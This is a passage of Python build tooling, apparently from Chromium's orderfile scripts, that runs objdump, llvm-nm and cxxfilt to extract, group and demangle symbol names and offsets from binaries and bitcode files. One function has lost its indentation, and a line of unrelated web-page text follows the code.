        info = _FromObjdumpLine(raw_line.decode('utf-8').rstrip('\n'))
        if info is None:
            continue
        # ARM long-branch thunks inserted by LLD legitimately live at many
        # offsets and never reach the orderfiles, so keep them out of the
        # duplicate-offset bookkeeping below.
        if not info.name.startswith('__ThumbV7PILongThunk_'):
            name_to_offsets[info.name].append(info.offset)
        symbol_infos.append(info)
    # Outlined functions are known to be repeated often, so ignore them in
    # the repeated symbol count.
    repeated = [name for name, offsets in name_to_offsets.items()
                if not name.startswith('OUTLINED_FUNCTION_')
                and len(offsets) > 1]
    if repeated:
        # Log the first 5 repeated offsets of the first 10 repeated symbols.
        details = '\n '.join(
            '{} {}'.format(name, ' '.join(
                str(offset) for offset in name_to_offsets[name][:5]))
            for name in repeated[:10])
        logging.warning('%d symbols repeated with multiple offsets:\n %s',
                        len(repeated), details)
    return symbol_infos
def SymbolInfosFromBinary(binary_filename):
    """Runs objdump to get all the symbols from a binary.

    Args:
      binary_filename: path to the binary.

    Returns:
      A list of SymbolInfo from the binary.
    """
    command = [_TOOL_PREFIX + 'objdump', '-t', '-w', binary_filename]
    try:
        process = subprocess.Popen(command, stdout=subprocess.PIPE)
    except OSError as error:
        logging.error("Failed to execute the command: path=%s, binary_filename=%s",
                      command[0], binary_filename)
        raise error
    try:
        return _SymbolInfosFromStream(process.stdout)
    finally:
        # Always release the pipe and reap the child, even on parse errors.
        process.stdout.close()
        process.wait()
_LLVM_NM_LINE_RE = re.compile(
r'^[\-0-9a-f]{8,16}[ ](?P<symbol_type>.)[ ](?P<name>.*)$', re.VERBOSE)
def _SymbolInfosFromLlvmNm(lines):
"""Extracts all defined symbols names from llvm-nm output.
Only defined (weak and regular) symbols are extracted.
Args:
lines: Iterable of lines.
Returns:
[str] A list of symbol names, can be empty.
"""
symbol_names = []
for line in lines:
line = line.decode('utf-8')
m = _LLVM_NM_LINE_RE.match(line)
assert m is not None, line
if m.group('symbol_type') not in ['t', 'T', 'w', 'W']:
continue
symbol_names.append(m.group('name'))
return symbol_names
# Path to the llvm-nm binary bundled with the Chromium clang package.
_NM_PATH = os.path.join(_SRC_PATH, 'third_party', 'llvm-build',
                        'Release+Asserts', 'bin', 'llvm-nm')


def CheckLlvmNmExists():
    """Fail fast, with an actionable message, when llvm-nm is not installed."""
    assert os.path.exists(_NM_PATH), (
        'llvm-nm not found. Please run '
        '//tools/clang/scripts/update.py --package=objdump to install it.')
def SymbolNamesFromLlvmBitcodeFile(filename):
    """Extracts all defined symbols names from an LLVM bitcode file.

    Args:
      filename: (str) File to parse.

    Returns:
      [str] A list of symbol names, can be empty.
    """
    command = (_NM_PATH, '--defined-only', filename)
    p = subprocess.Popen(command, shell=False, stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE)
    try:
        result = _SymbolInfosFromLlvmNm(p.stdout)
        if not result:
            # An empty symbol list is suspicious; log the file size to help
            # distinguish truncated inputs from genuinely empty modules.
            file_size = os.stat(filename).st_size
            logging.warning('No symbols for %s (size %d)', filename, file_size)
        return result
    finally:
        # Drain remaining output so the child can exit, then require a
        # clean exit status.
        _, _ = p.communicate()
        p.stdout.close()
        assert p.wait() == 0
def GroupSymbolInfosByOffset(symbol_infos):
    """Create a dict {offset: [symbol_info1, ...], ...}.

    As several symbols can be at the same offset, this is a 1-to-many
    relationship.

    Args:
      symbol_infos: iterable of SymbolInfo instances

    Returns:
      a dict {offset: [symbol_info1, ...], ...}
    """
    grouped = {}
    for info in symbol_infos:
        grouped.setdefault(info.offset, []).append(info)
    return grouped
def GroupSymbolInfosByName(symbol_infos):
    """Create a dict {name: [symbol_info1, ...], ...}.

    A symbol can have several offsets, this is a 1-to-many relationship.

    Args:
      symbol_infos: iterable of SymbolInfo instances

    Returns:
      a dict {name: [symbol_info1, ...], ...}
    """
    by_name = {}
    for info in symbol_infos:
        by_name.setdefault(info.name, []).append(info)
    return by_name
def CreateNameToSymbolInfo(symbol_infos):
    """Create a dict {name: symbol_info, ...}.

    Args:
      symbol_infos: iterable of SymbolInfo instances

    Returns:
      a dict {name: symbol_info, ...}
      If a symbol name corresponds to more than one symbol_info, the
      symbol_info with the lowest offset is chosen.
    """
    # TODO(lizeb,pasko): move the functionality in this method into
    # check_orderfile.
    result = {}
    warnings = cygprofile_utils.WarningCollector(_MAX_WARNINGS_TO_PRINT)
    for duplicates in GroupSymbolInfosByName(symbol_infos).values():
        canonical = min(duplicates, key=lambda info: info.offset)
        result[canonical.name] = canonical
        if len(duplicates) > 1:
            offsets = ','.join([hex(info.offset) for info in duplicates])
            warnings.Write('Symbol %s appears at %d offsets: %s' %
                           (canonical.name, len(duplicates), offsets))
    warnings.WriteEnd('symbols at multiple offsets.')
    return result
def DemangleSymbol(mangled_symbol):
    """Return the demangled form of mangled_symbol."""
    command = [_TOOL_PREFIX + 'cxxfilt', mangled_symbol]
    output = subprocess.check_output(command, universal_newlines=True)
    return output.rstrip()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.